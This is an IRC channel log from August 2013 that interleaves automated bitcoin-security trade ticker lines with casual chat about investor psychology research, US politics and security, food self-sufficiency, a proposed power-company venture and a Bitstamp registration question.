[W4A-BOOK] 1 @ 0.46 BTC [-] Aug 14 03:26:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005588 BTC [+] Aug 14 03:26:08 [BTCTC] [ACTIVEMINING] 17 @ 0.00559 = 0.095 BTC [+] Aug 14 03:26:18 [BTCTC] [LABCOIN] 30 @ 0.001531 = 0.0459 BTC [+] Aug 14 03:26:50 [BTCTC] [LABCOIN] 1 @ 0.001531 BTC [+] Aug 14 03:27:08 [BTCTC] [LABCOIN] 29 @ 0.001532 = 0.0444 BTC [+] Aug 14 03:28:25 [BTCTC] [LABCOIN] 30 @ 0.001531 = 0.0459 BTC [-] Aug 14 03:28:53 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [+] Aug 14 03:29:20 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [+] Aug 14 03:29:55 [BTCTC] [LABCOIN] 30 @ 0.001535 = 0.0461 BTC [+] Aug 14 03:29:57 [BTCTC] [ASICMINER-PT] 1 @ 3.936 BTC [+] Aug 14 03:30:34 [BTCTC] [LABCOIN] 300 @ 0.001534 = 0.4602 BTC [-] Aug 14 03:30:41 [BTCTC] [LABCOIN] 30 @ 0.001534 = 0.046 BTC [-] Aug 14 03:30:42 [BTCTC] [ACTIVEMINING] 36 @ 0.005587 = 0.2011 BTC [-] Aug 14 03:30:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005588 = 0.2794 BTC [+] Aug 14 03:30:45 [BTCTC] [ACTIVEMINING] 133 @ 0.00559 = 0.7435 BTC [+] Aug 14 03:30:46 [BTCTC] [ACTIVEMINING] 157 @ 0.005595 = 0.8784 BTC [+] Aug 14 03:30:47 [BTCTC] [ACTIVEMINING] 10 @ 0.005596 = 0.056 BTC [+] Aug 14 03:31:17 [BTCTC] [ACTIVEMINING] 240 @ 0.0056 = 1.344 BTC [+] Aug 14 03:31:20 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [-] Aug 14 03:31:41 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [-] Aug 14 03:31:52 [BTCTC] [ACTIVEMINING] 78 @ 0.0056 = 0.4368 BTC [+] Aug 14 03:32:04 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [-] Aug 14 03:32:28 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [-] Aug 14 03:32:43 [HAVELOCK] [VTX] 2 @ 0.545 = 1.09 BTC [-] Aug 14 03:33:40 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [-] Aug 14 03:34:14 [BTCTC] [LABCOIN] 3 @ 0.001532 = 0.0046 BTC [-] Aug 14 03:36:17 [BTCTC] [LABCOIN] 1 @ 0.001533 BTC [+] Aug 14 03:36:46 [BTCTC] [LABCOIN] 30 @ 0.001533 = 0.046 BTC [+] Aug 14 03:39:41 [BTCTC] [LABCOIN] 6 @ 0.001482 = 0.0089 BTC [-] Aug 14 03:39:43 [BTCTC] [LABCOIN] 563 @ 0.001481 = 0.8338 BTC [-] Aug 14 03:39:55 [MPEX] [S.MPOE] 12100 @ 0.00082802 = 10.019 BTC [+] Aug 14 03:42:50 [BTCTC] [LABCOIN] 7 @ 0.001483 = 0.0104 BTC [+] Aug 14 03:42:52 [BTCTC] [LABCOIN] 393 @ 0.001481 = 0.582 BTC [-] Aug 14 03:44:11 [BTCTC] [ACTIVEMINING] 1 @ 0.0056 BTC [+] Aug 14 03:44:23 [BTCTC] [LABCOIN] 1000 @ 0.001481 = 1.481 BTC [-] Aug 14 03:45:30 [BTCTC] [BASIC-MINING] 2 @ 0.3261 = 0.6522 BTC [+] Aug 14 03:45:32 [BTCTC] [BASIC-MINING] 6 @ 0.3262 = 1.9572 BTC [+] Aug 14 03:45:37 [BTCTC] [BASIC-MINING] 2 @ 0.3262 = 0.6524 BTC [+] Aug 14 03:46:15 [BTCTC] [BASIC-MINING] 1 @ 0.32 BTC [-] Aug 14 03:47:28 [BTCTC] [LABCOIN] 6 @ 0.00154 = 0.0092 BTC [+] Aug 14 03:47:29 [BTCTC] [LABCOIN] 30 @ 0.00154 = 0.0462 BTC [+] Aug 14 03:48:20 [BTCTC] [LABCOIN] 2 @ 0.00154 = 0.0031 BTC [+] Aug 14 03:48:30 [BTCTC] [LABCOIN] 62 @ 0.00154 = 0.0955 BTC [+] **** BEGIN LOGGING AT Wed Aug 14 11:27:06 2013 Aug 14 11:27:40 [HAVELOCK] [XBOND] 29 @ 0.0010497 = 0.0304 BTC [-] Aug 14 11:27:59 [HAVELOCK] [XBOND] 855 @ 0.0010498 = 0.8976 BTC [+] Aug 14 11:28:26 [HAVELOCK] [AM100] 65 @ 0.0386001 = 2.509 BTC [-] Aug 14 11:29:28 [MPEX] [S.MPOE] 4980 @ 0.00083095 = 4.1381 BTC [-] Aug 14 11:29:29 [MPEX] [S.MPOE] 4850 @ 0.00082947 = 4.0229 BTC [-] Aug 14 11:29:44 [HAVELOCK] [XBOND] 50 @ 0.0010498 = 0.0525 BTC [+] Aug 14 11:30:19 [HAVELOCK] [XBOND] 10 @ 0.0010498 = 0.0105 BTC [+] Aug 14 11:30:26 [HAVELOCK] [XBOND] 8 @ 0.0010498 = 0.0084 BTC [+] Aug 14 11:31:51 [BTCTC] [DMS.PURCHASE] 5 @ 0.028 = 0.14 BTC [+] Aug 14 11:42:57 [BTCTC] [ACTIVEMINING] 3 @ 0.005375 = 0.0161 BTC [+] Aug 14 11:43:27 http://marojejian.tumblr.com/post/35743567678/the-sheeples-brain Aug 14 11:43:29 Marojejian - The Sheeple's Brain Aug 14 11:44:21 lol "Participants were asked to play a simple science fiction computer game where they would be acting as future investors." Aug 14 11:44:48 from the linked research article Aug 14 11:44:54 hehe Aug 14 11:44:59 lol wall street is a scam Aug 14 11:45:06 it's a strange thing with this sort of research Aug 14 11:45:20 [BTCTC] [BASIC-MINING] 2 @ 0.3348 = 0.6696 BTC [+] Aug 14 11:45:22 every piece of it i've seen POSITS that the submissive/dominance circuitry makes things "worse" Aug 14 11:45:34 is so Aug 14 11:45:37 [BTCTC] [LABCOIN] 30 @ 0.00158 = 0.0474 BTC [+] Aug 14 11:45:38 [BTCTC] [LABCOIN] 3 @ 0.001581 = 0.0047 BTC [+] Aug 14 11:45:39 [BTCTC] [LABCOIN] 2 @ 0.001584 = 0.0032 BTC [+] Aug 14 11:45:39 why do people fap to bsdm porn Aug 14 11:45:39 [BTCTC] [LABCOIN] 20 @ 0.001585 = 0.0317 BTC [+] Aug 14 11:45:40 not once has this yet been actually proven, and moreover we have quite clear proof that the "preferable alternative" works. Aug 14 11:45:40 [BTCTC] [LABCOIN] 78 @ 0.001589 = 0.1239 BTC [+] Aug 14 11:45:41 [BTCTC] [LABCOIN] 130 @ 0.00159 = 0.2067 BTC [+] Aug 14 11:45:42 [BTCTC] [LABCOIN] 117 @ 0.00159 = 0.186 BTC [+] Aug 14 11:45:57 in fact as best anyone can tell, the us went tits up just as soon as people started trying to merely think about giving it up Aug 14 11:47:25 [BTCTC] [LABCOIN] 7 @ 0.001589 = 0.0111 BTC [-] Aug 14 11:48:59 the original source is actually positive about it: Aug 14 11:49:07 http://www.sciencedaily.com/releases/2012/11/121108131615.htm Aug 14 11:49:14 so Aug 14 11:49:24 I need to look into registering a c-corp Aug 14 11:50:25 [BTCTC] [KENILWORTH] 10 @ 0.001601 = 0.016 BTC [-] Aug 14 11:50:27 [BTCTC] [KENILWORTH] 34 @ 0.001601 = 0.0544 BTC [-] Aug 14 11:50:36 jurov or at least a lot more neutral Aug 14 11:50:40 [BTCTC] [ASICMINER-PT] 1 @ 4.055 BTC [+] Aug 14 11:52:13 [HAVELOCK] [AM100] 150 @ 0.0386 = 5.79 BTC [-] Aug 14 11:52:46 https://bitcointalk.org/index.php?topic=271494.msg2928605#msg2928605 < mircea_popescu: but really, we need to consider more things and use other parts of brain than just amygdala to determine social standing today as compared to past, no? Aug 14 11:52:55 [MPEX] [S.MPOE] 16100 @ 0.00082947 = 13.3545 BTC [-] Aug 14 11:52:56 FU all you trolls and doubters where are you now??????????/ Aug 14 11:53:12 jurov sure. the idea is that we can't take it away, not that we shouldn't add. Aug 14 11:53:54 [BTCTC] [LABCOIN] 30 @ 0.001553 = 0.0466 BTC [-] Aug 14 11:53:54 [BTCTC] [LABCOIN] 20 @ 0.001552 = 0.031 BTC [-] Aug 14 11:53:56 [BTCTC] [LABCOIN] 33 @ 0.001546 = 0.051 BTC [-] Aug 14 11:53:56 [BTCTC] [LABCOIN] 71 @ 0.001545 = 0.1097 BTC [-] Aug 14 11:53:58 [BTCTC] [LABCOIN] 19 @ 0.001544 = 0.0293 BTC [-] Aug 14 11:53:58 [BTCTC] [LABCOIN] 52 @ 0.001543 = 0.0802 BTC [-] Aug 14 11:54:00 [BTCTC] [LABCOIN] 39 @ 0.001542 = 0.0601 BTC [-] Aug 14 11:54:01 [BTCTC] [LABCOIN] 9 @ 0.001542 = 0.0139 BTC [-] Aug 14 11:54:02 [BTCTC] [LABCOIN] 48 @ 0.001541 = 0.074 BTC [-] Aug 14 11:54:03 [BTCTC] [LABCOIN] 39 @ 0.00154 = 0.0601 BTC [-] Aug 14 11:54:04 [BTCTC] [LABCOIN] 11 @ 0.00154 = 0.0169 BTC [-] Aug 14 11:54:05 [BTCTC] [LABCOIN] 51 @ 0.001539 = 0.0785 BTC [-] Aug 14 11:54:06 [BTCTC] [LABCOIN] 44 @ 0.001538 = 0.0677 BTC [-] Aug 14 11:54:06 [BTCTC] [LABCOIN] 35 @ 0.001537 = 0.0538 BTC [-] Aug 14 11:54:07 [BTCTC] [LABCOIN] 51 @ 0.001537 = 0.0784 BTC [-] Aug 14 11:54:08 [BTCTC] [LABCOIN] 300 @ 0.001536 = 0.4608 BTC [-] Aug 14 11:54:12 [BTCTC] [LABCOIN] 30 @ 0.001536 = 0.0461 BTC [-] Aug 14 11:54:23 [BTCTC] [LABCOIN] 115 @ 0.001535 = 0.1765 BTC [-] Aug 14 11:55:18 [BTCTC] [LABCOIN] 1288 @ 0.001531 = 1.9719 BTC [-] Aug 14 11:56:12 [BTCTC] [LABCOIN] 760 @ 0.001531 = 1.1636 BTC [-] Aug 14 11:56:56 [BTCTC] [LABCOIN] 30 @ 0.001588 = 0.0476 BTC [+] Aug 14 11:56:58 [BTCTC] [LABCOIN] 47 @ 0.001589 = 0.0747 BTC [+] Aug 14 11:56:59 [BTCTC] [LABCOIN] 304 @ 0.00159 = 0.4834 BTC [+] Aug 14 11:57:55 [BTCTC] [ASICMINER-PT] 1 @ 4.055 BTC [+] Aug 14 11:58:06 [BTCTC] [LABCOIN] 6 @ 0.001589 = 0.0095 BTC [-] Aug 14 11:58:24 lol just invented a meme: "Europeans not affected." Aug 14 11:59:37 jurov http://www.theregister.co.uk/2013/06/08/what_about_a_us_tech_boycott/ i thought was pretty good. Aug 14 12:00:19 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.000996 = 0.0139 BTC [+] Aug 14 12:01:28 [BTCTC] [TAT.ASICMINER] 70 @ 0.04095 = 2.8665 BTC [+] Aug 14 12:01:51 Those with more to lose are far more willing to reduce the liberty of all in the vain hope of defending their monetisable assets. This is perhaps an explanation for why so many have come to associate freedom with "security at all costs". Aug 14 12:01:52 etc Aug 14 12:02:12 mircea_popescu: yes but Aug 14 12:02:16 security at all costs isnt wrong Aug 14 12:02:21 [BTCTC] [LABCOIN] 1 @ 0.001584 BTC [-] Aug 14 12:02:23 its just that they're defining security wrong Aug 14 12:02:24 [BTCTC] [LABCOIN] 14 @ 0.001585 = 0.0222 BTC [+] Aug 14 12:02:37 having the freedom to think and act is also part of that security. Aug 14 12:03:03 when we cant leave our homes or do anything in our homes because we're afraid of being sent to gitmo Aug 14 12:03:19 then the terrorists have won and are elected to office. Aug 14 12:03:25 [HAVELOCK] [XBOND] 190 @ 0.0010498 = 0.1995 BTC [+] Aug 14 12:03:31 thus the government has failed to keep us secure Aug 14 12:04:02 i think your expectation that someone else will be keeping you secure already seals that deal. Aug 14 12:04:15 exactly Aug 14 12:04:24 the only way for the US to be secure is for everyone to be part of that Aug 14 12:04:51 and the moment we're not, we're not secure. Aug 14 12:04:55 ya well that ain't happening Aug 14 12:05:02 the alternative is slaughter, which seems more likely. Aug 14 12:05:05 yes, Im literally saying teach people in anti-crime and anti-terrorism stuff Aug 14 12:05:09 everyone Aug 14 12:05:10 men, women, kids Aug 14 12:05:15 make it a manditory high school class Aug 14 12:05:50 you are required to be willing to defend yourself, your family, and your neighborhood at a drop of a hat Aug 14 12:06:04 that IS what it used to mean to be american Aug 14 12:06:52 ya well, that won't work very well with all the entitlement and minority rights. Aug 14 12:07:11 well, it basically starts at food security. if you have to depend on others for all your food, then nothing else matters Aug 14 12:07:17 jurov: I agree Aug 14 12:07:23 america is always 3 days away from a total meltdown Aug 14 12:07:35 the only reason we dont get there is because there is always food on the shelves Aug 14 12:08:28 jurov there's that weird sect in utah insists everyone keeps a year's supply of food Aug 14 12:09:17 mircea_popescu: a year is a bit much Aug 14 12:09:19 but 2 weeks is good Aug 14 12:09:20 https://bitcointalk.org/index.php?topic=263684.0;all Aug 14 12:09:24 this shit is beyond belief Aug 14 12:09:26 Amethyst - The billion dollar Idea - 3btc a share. Aug 14 12:09:27 VanCleef dude... Aug 14 12:09:31 >3btc a share Aug 14 12:09:36 and I thought my 1btc a share idea was high Aug 14 12:09:39 no i mean it in that eastern european sense that everyone has some land and uses it to help themselves Aug 14 12:10:24 then everyone exchanges products to much societal benefit Aug 14 12:10:35 uinlike just buying cans and stuffing them somewhere Aug 14 12:11:09 jurov: yeah and like Aug 14 12:11:15 I want to start buying beef locally Aug 14 12:11:17 but its too expensive Aug 14 12:11:28 [BTCTC] [LABCOIN] 30 @ 0.001543 = 0.0463 BTC [-] Aug 14 12:11:30 [BTCTC] [LABCOIN] 31 @ 0.001542 = 0.0478 BTC [-] Aug 14 12:11:31 [BTCTC] [LABCOIN] 11 @ 0.001541 = 0.017 BTC [-] Aug 14 12:11:32 [BTCTC] [LABCOIN] 8 @ 0.001541 = 0.0123 BTC [-] Aug 14 12:11:34 [BTCTC] [LABCOIN] 33 @ 0.00154 = 0.0508 BTC [-] Aug 14 12:11:35 [BTCTC] [LABCOIN] 17 @ 0.001539 = 0.0262 BTC [-] Aug 14 12:11:36 [BTCTC] [LABCOIN] 55 @ 0.001539 = 0.0846 BTC [-] Aug 14 12:11:36 [BTCTC] [LABCOIN] 14 @ 0.001538 = 0.0215 BTC [-] Aug 14 12:11:38 I mean they dont realize that I'd easily pay them $400 a month Aug 14 12:11:39 for beef Aug 14 12:11:45 jurov actually the mormon ppl have this joint farm where they work together and then split the harvest Aug 14 12:12:03 reality is if you're only just thinking about this you the slowest buffalo Aug 14 12:12:05 [HAVELOCK] [AM100] 5 @ 0.0389 = 0.1945 BTC [+] Aug 14 12:12:21 dub: wtf. Aug 14 12:13:41 [BTCTC] [ASICMINER-PT] 1 @ 4.055 BTC [+] Aug 14 12:13:42 mircea_popescu: okay so, if I start DMC 2.0 part A (the power company), would you invest in it? Aug 14 12:14:21 nope. Aug 14 12:14:36 why not? Aug 14 12:14:46 power is a highly commodified highly regulated field. Aug 14 12:14:50 [BTCTC] [NASTY-PT] 15 @ 0.00445 = 0.0668 BTC [-] Aug 14 12:14:51 [BTCTC] [NASTY-PT] 1 @ 0.00445 BTC [-] Aug 14 12:14:53 [BTCTC] [NASTY-PT] 50 @ 0.0045 = 0.225 BTC [+] Aug 14 12:14:54 [BTCTC] [NASTY-PT] 154 @ 0.0046 = 0.7084 BTC [+] Aug 14 12:15:06 i would not invest in it in general for the first count. even without that, unless you own some senators you're wasting youer time Aug 14 12:15:06 [HAVELOCK] [XBOND] 5 @ 0.0010498 = 0.0052 BTC [+] Aug 14 12:15:13 mircea_popescu: yes, and its ripe for disruption. Aug 14 12:15:26 disruption happens at the point of a gun. Aug 14 12:15:54 [BTCTC] [NASTY-PT] 271 @ 0.0046 = 1.2466 BTC [+] Aug 14 12:15:55 [BTCTC] [NASTY-PT] 20 @ 0.004672 = 0.0934 BTC [+] Aug 14 12:15:56 [BTCTC] [NASTY-PT] 11 @ 0.004672 = 0.0514 BTC [+] Aug 14 12:15:57 [HAVELOCK] [XBOND] 5 @ 0.0010498 = 0.0052 BTC [+] Aug 14 12:16:13 take an easier tack, make a broadway show company that does not allow unions. Aug 14 12:16:43 [BTCTC] [BASIC-MINING] 3 @ 0.3338 = 1.0014 BTC [-] Aug 14 12:19:08 lol mircea_popescu Aug 14 12:21:07 mircea_popescu: they cant stop me if I make enough noise Aug 14 12:21:25 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [+] Aug 14 12:22:02 Diablo-D3 maybe they can't. i'm not putting btc on it. Aug 14 12:31:24 [BTCTC] [LABCOIN] 20 @ 0.001545 = 0.0309 BTC [+] Aug 14 12:31:27 [BTCTC] [LABCOIN] 30 @ 0.001543 = 0.0463 BTC [-] Aug 14 12:33:38 [BTCTC] [ASICMINER-PT] 1 @ 4.055 BTC [+] Aug 14 12:33:39 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 14 12:33:41 [BTCTC] [ASICMINER-PT] 1 @ 4.063 BTC [+] Aug 14 12:33:42 [BTCTC] [ASICMINER-PT] 1 @ 4.064 BTC [+] Aug 14 12:34:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.04095 = 0.4095 BTC [+] Aug 14 12:34:39 [BTCTC] [TAT.ASICMINER] 9 @ 0.04096 = 0.3686 BTC [+] Aug 14 12:38:05 [BTCTC] [MININGCO.ETF] 1 @ 1.5 BTC [+] Aug 14 12:44:07 VanCleef let me know when i have your permission to blow the AM thing. Aug 14 12:44:53 [BTCTC] [LABCOIN] 30 @ 0.00156 = 0.0468 BTC [+] Aug 14 12:45:26 [BTCTC] [LABCOIN] 30 @ 0.00156 = 0.0468 BTC [+] Aug 14 12:47:10 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00105 = 0.0021 BTC [+] Aug 14 12:47:18 [BTCTC] [LABCOIN] 6 @ 0.00156 = 0.0094 BTC [+] Aug 14 12:54:53 [MPEX] [S.MPOE] 1850 @ 0.00082947 = 1.5345 BTC [-] Aug 14 12:55:57 blow the AM thing? Aug 14 12:57:13 [BTCTC] [LABCOIN] 70 @ 0.00157 = 0.1099 BTC [+] Aug 14 13:00:09 [HAVELOCK] [XBOND] 21 @ 0.0010498 = 0.022 BTC [+] Aug 14 13:00:50 ;;ticker Aug 14 13:00:50 MtGox BTCUSD ticker | Best bid: 113.61547, Best ask: 113.99999, Bid-ask spread: 0.38452, Last trade: 114.49900, 24 hour volume: 37082.93900969, 24 hour low: 104.50000, 24 hour high: 115.00000, 24 hour vwap: 110.32099 Aug 14 13:05:20 [HAVELOCK] [AM100] 51 @ 0.0386 = 1.9686 BTC [-] Aug 14 13:09:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005521 = 0.0552 BTC [+] Aug 14 13:09:46 [BTCTC] [ACTIVEMINING] 50 @ 0.005522 = 0.2761 BTC [+] Aug 14 13:09:47 [BTCTC] [ACTIVEMINING] 24 @ 0.005539 = 0.1329 BTC [+] Aug 14 13:09:48 [BTCTC] [ACTIVEMINING] 120 @ 0.00554 = 0.6648 BTC [+] Aug 14 13:09:49 [BTCTC] [ACTIVEMINING] 2 @ 0.005582 = 0.0112 BTC [+] Aug 14 13:09:50 [BTCTC] [ACTIVEMINING] 10 @ 0.005583 = 0.0558 BTC [+] Aug 14 13:11:29 [BTCTC] [LABCOIN] 1000 @ 0.00155 = 1.55 BTC [-] Aug 14 13:15:40 [BTCTC] [LABCOIN] 70 @ 0.001541 = 0.1079 BTC [-] Aug 14 13:15:41 [BTCTC] [LABCOIN] 1 @ 0.001541 BTC [-] Aug 14 13:15:43 [BTCTC] [LABCOIN] 247 @ 0.00154 = 0.3804 BTC [-] Aug 14 13:15:44 [BTCTC] [LABCOIN] 58 @ 0.001539 = 0.0893 BTC [-] Aug 14 13:15:45 [BTCTC] [LABCOIN] 66 @ 0.001538 = 0.1015 BTC [-] Aug 14 13:15:45 [BTCTC] [LABCOIN] 141 @ 0.001537 = 0.2167 BTC [-] Aug 14 13:15:46 [BTCTC] [LABCOIN] 74 @ 0.001536 = 0.1137 BTC [-] Aug 14 13:15:48 [BTCTC] [LABCOIN] 66 @ 0.001535 = 0.1013 BTC [-] Aug 14 13:15:49 [BTCTC] [LABCOIN] 200 @ 0.001533 = 0.3066 BTC [-] Aug 14 13:15:50 [BTCTC] [LABCOIN] 600 @ 0.001532 = 0.9192 BTC [-] Aug 14 13:15:51 [BTCTC] [LABCOIN] 430 @ 0.001532 = 0.6588 BTC [-] Aug 14 13:15:52 [BTCTC] [LABCOIN] 10000 @ 0.00153 = 15.3 BTC [-] Aug 14 13:15:56 [BTCTC] [LABCOIN] 30 @ 0.00153 = 0.0459 BTC [-] Aug 14 13:16:06 [HAVELOCK] [AM100] 1 @ 0.0388999 BTC [+] Aug 14 13:16:10 [BTCTC] [LABCOIN] 20 @ 0.00153 = 0.0306 BTC [-] Aug 14 13:16:43 [BTCTC] [LABCOIN] 970 @ 0.001526 = 1.4802 BTC [-] Aug 14 13:16:45 [BTCTC] [LABCOIN] 750 @ 0.001525 = 1.1438 BTC [-] Aug 14 13:16:46 [BTCTC] [LABCOIN] 500 @ 0.001524 = 0.762 BTC [-] Aug 14 13:16:47 [BTCTC] [LABCOIN] 1539 @ 0.001517 = 2.3347 BTC [-] Aug 14 13:17:04 [BTCTC] [LABCOIN] 445 @ 0.001515 = 0.6742 BTC [-] Aug 14 13:17:22 [BTCTC] [LABCOIN] 1555 @ 0.001515 = 2.3558 BTC [-] Aug 14 13:17:23 [BTCTC] [LABCOIN] 3000 @ 0.001505 = 4.515 BTC [-] Aug 14 13:17:25 [BTCTC] [LABCOIN] 2000 @ 0.001501 = 3.002 BTC [-] Aug 14 13:17:36 [BTCTC] [LABCOIN] 1500 @ 0.0015 = 2.25 BTC [-] Aug 14 13:18:14 [BTCTC] [LABCOIN] 55 @ 0.0015 = 0.0825 BTC [-] Aug 14 13:20:02 [MPEX] [S.MPOE] 8100 @ 0.00083356 = 6.7518 BTC [+] Aug 14 13:20:03 [MPEX] [S.MPOE] 8400 @ 0.00083422 = 7.0074 BTC [+] Aug 14 13:20:04 [MPEX] [S.MPOE] 1650 @ 0.00083612 = 1.3796 BTC [+] Aug 14 13:20:17 [BTCTC] [LABCOIN] 55 @ 0.0015 = 0.0825 BTC [-] Aug 14 13:21:13 [BTCTC] [LABCOIN] 445 @ 0.001501 = 0.6679 BTC [+] Aug 14 13:22:47 [BTCTC] [LABCOIN] 20 @ 0.001502 = 0.03 BTC [+] Aug 14 13:22:49 [BTCTC] [LABCOIN] 350 @ 0.001501 = 0.5254 BTC [-] Aug 14 13:22:50 [BTCTC] [LABCOIN] 890 @ 0.0015 = 1.335 BTC [-] Aug 14 13:22:51 [BTCTC] [LABCOIN] 43 @ 0.0015 = 0.0645 BTC [-] Aug 14 13:22:53 [BTCTC] [LABCOIN] 191 @ 0.001483 = 0.2833 BTC [-] Aug 14 13:22:54 [BTCTC] [LABCOIN] 30 @ 0.001483 = 0.0445 BTC [-] Aug 14 13:24:25 [BTCTC] [ACTIVEMINING] 5 @ 0.005582 = 0.0279 BTC [-] Aug 14 13:24:25 [BTCTC] [ACTIVEMINING] 20 @ 0.005583 = 0.1117 BTC [+] Aug 14 13:24:39 [BTCTC] [LABCOIN] 30 @ 0.001485 = 0.0446 BTC [+] Aug 14 13:24:41 [BTCTC] [LABCOIN] 3 @ 0.001484 = 0.0045 BTC [-] Aug 14 13:24:42 [BTCTC] [LABCOIN] 443 @ 0.001484 = 0.6574 BTC [-] Aug 14 13:24:55 [BTCTC] [NASTY-PT] 4 @ 0.0051 = 0.0204 BTC [+] Aug 14 13:24:57 [BTCTC] [NASTY-PT] 41 @ 0.00511 = 0.2095 BTC [+] Aug 14 13:25:44 [BTCTC] [BASIC-MINING] 4 @ 0.3102 = 1.2408 BTC [-] Aug 14 13:29:02 http://www.npr.org/blogs/thetwo-way/2013/08/13/211602534/rodeo-clown-who-wore-obama-mask-banned-from-state-fair Aug 14 13:29:03 Rodeo Clown Who Wore Obama Mask Is Banned From State Fair : The Two-Way : NPR Aug 14 13:29:09 the crime of "insulting the president" Aug 14 13:30:07 [BTCTC] [DMS.MINING] 20 @ 0.003203 = 0.0641 BTC [-] Aug 14 13:31:46 probably a narcoterrorist Aug 14 13:32:51 clearly. Aug 14 13:32:59 and let's not forget the child porn. Aug 14 13:33:11 [BTCTC] [DMS.MINING] 85 @ 0.003203 = 0.2723 BTC [-] Aug 14 13:34:20 [BTCTC] [PAJKA.BOND] 5 @ 0.01351 = 0.0676 BTC [-] Aug 14 13:42:29 [BTCTC] [BASIC-MINING] 6 @ 0.3102 = 1.8612 BTC [-] Aug 14 13:42:30 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [-] Aug 14 13:42:32 [BTCTC] [BASIC-MINING] 10 @ 0.3095 = 3.095 BTC [-] Aug 14 13:43:11 [BTCTC] [BASIC-MINING] 5 @ 0.3064 = 1.532 BTC [-] Aug 14 13:43:11 [BTCTC] [BASIC-MINING] 1 @ 0.3063 BTC [-] Aug 14 13:43:58 [BTCTC] [DMS.SELLING] 25 @ 0.0249 = 0.6225 BTC [+] Aug 14 13:43:59 [BTCTC] [DMS.SELLING] 100 @ 0.025 = 2.5 BTC [+] Aug 14 13:44:00 [BTCTC] [DMS.SELLING] 10 @ 0.025 = 0.25 BTC [+] Aug 14 13:47:02 bitstamp support: Dear dexX7, Bitstamp LIMITED was not sold to anyone. If you examine the document again, you will see that the Slovenian business register refers to "Bitstamp d.d." which is a different legal entity than "Bitstamp LIMITED". If you have any additional questions, please feel free to contact us again. Best regards, Miha Grčar Aug 14 13:47:04 [HAVELOCK] [AM100] 10 @ 0.0382 = 0.382 BTC [-] Aug 14 13:48:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005438 = 0.1631 BTC [-] Aug 14 13:49:05 http://www.ajpes.si/prs/podjetje_zgodovina.asp?s=1&e=504891&n=1&pdf=no << a bit odd, chrome translate shows d.o.o. as Ltd. Aug 14 13:49:12 AJPES - Agencija Republike Slovenije za javnopravne evidence in storitve Aug 14 13:49:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005438 = 0.1631 BTC [-] Aug 14 13:50:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005438 = 0.1631 BTC [-] Aug 14 13:51:12 [BTCTC] [ACTIVEMINING] 9 @ 0.005438 = 0.0489 BTC [-] Aug 14 13:52:03 dexX7 doo is ltd. Aug 14 13:54:18 and bitstamp is in the uk, according to their about us Aug 14 13:54:35 i don't understand this stuff :D Aug 14 13:58:42 [HAVELOCK] [AM100] 10 @ 0.0381 = 0.381 BTC [-] Aug 14 13:59:41 [BTCTC] [TAT.ASICMINER] 22 @ 0.04096 = 0.9011 BTC [+] Aug 14 14:00:06 [HAVELOCK] [AM100] 140 @ 0.0385 = 5.39 BTC [+] Aug 14 14:09:17 http://www.breitbart.com/Big-Government/2013/08/13/Missouri-NAACP-rodeo-clown Aug 14 14:09:20 NAACP: DOJ, Secret Service Should Investigate Rodeo Clown Aug 14 14:09:26 ahaha that's one line usg. Aug 14 14:10:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.04096 = 0.2048 BTC [+] Aug 14 14:12:30 [BTCTC] [BASIC-MINING] 11 @ 0.3315 = 3.6465 BTC [+] Aug 14 14:14:57 [BTCTC] [BASIC-MINING] 1 @ 0.3315 BTC [+] Aug 14 14:14:58 [BTCTC] [BASIC-MINING] 1 @ 0.3317 BTC [+] Aug 14 14:15:17 [MPEX] [S.MPOE] 17800 @ 0.00083612 = 14.8829 BTC [+] Aug 14 14:15:19 [MPEX] [S.MPOE] 2100 @ 0.00083788 = 1.7595 BTC [+] Aug 14 14:15:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00105 BTC [+] Aug 14 14:19:03 sometimes i think i am surrounded by moroons Aug 14 14:19:44 random_cat why, you live in missouri ? Aug 14 14:23:50 no. those fuckers are above average iq, clearly. Aug 14 14:24:11 lmaO Aug 14 14:24:32 except the politicians, of course Aug 14 14:25:18 [BTCTC] [LABCOIN] 30 @ 0.001538 = 0.0461 BTC [+] Aug 14 14:25:20 [BTCTC] [LABCOIN] 3 @ 0.001539 = 0.0046 BTC [+] Aug 14 14:25:21 [BTCTC] [LABCOIN] 2 @ 0.001541 = 0.0031 BTC [+] Aug 14 14:25:22 [BTCTC] [LABCOIN] 20 @ 0.001542 = 0.0308 BTC [+] Aug 14 14:25:23 [BTCTC] [LABCOIN] 53 @ 0.001564 = 0.0829 BTC [+] Aug 14 14:25:24 [BTCTC] [LABCOIN] 800 @ 0.001565 = 1.252 BTC [+] Aug 14 14:25:25 [BTCTC] [LABCOIN] 24 @ 0.001569 = 0.0377 BTC [+] Aug 14 14:25:26 [BTCTC] [LABCOIN] 125 @ 0.00157 = 0.1963 BTC [+] Aug 14 14:25:27 [BTCTC] [LABCOIN] 71 @ 0.00157 = 0.1115 BTC [+] Aug 14 14:25:28 [BTCTC] [LABCOIN] 500 @ 0.001587 = 0.7935 BTC [+] Aug 14 14:25:29 [BTCTC] [LABCOIN] 686 @ 0.001588 = 1.0894 BTC [+] Aug 14 14:25:30 [BTCTC] [LABCOIN] 5000 @ 0.001589 = 7.945 BTC [+] Aug 14 14:25:31 [BTCTC] [LABCOIN] 79 @ 0.00159 = 0.1256 BTC [+] Aug 14 14:25:32 [BTCTC] [LABCOIN] 127 @ 0.00159 = 0.2019 BTC [+] Aug 14 14:26:01 [BTCTC] [DMS.PURCHASE] 358 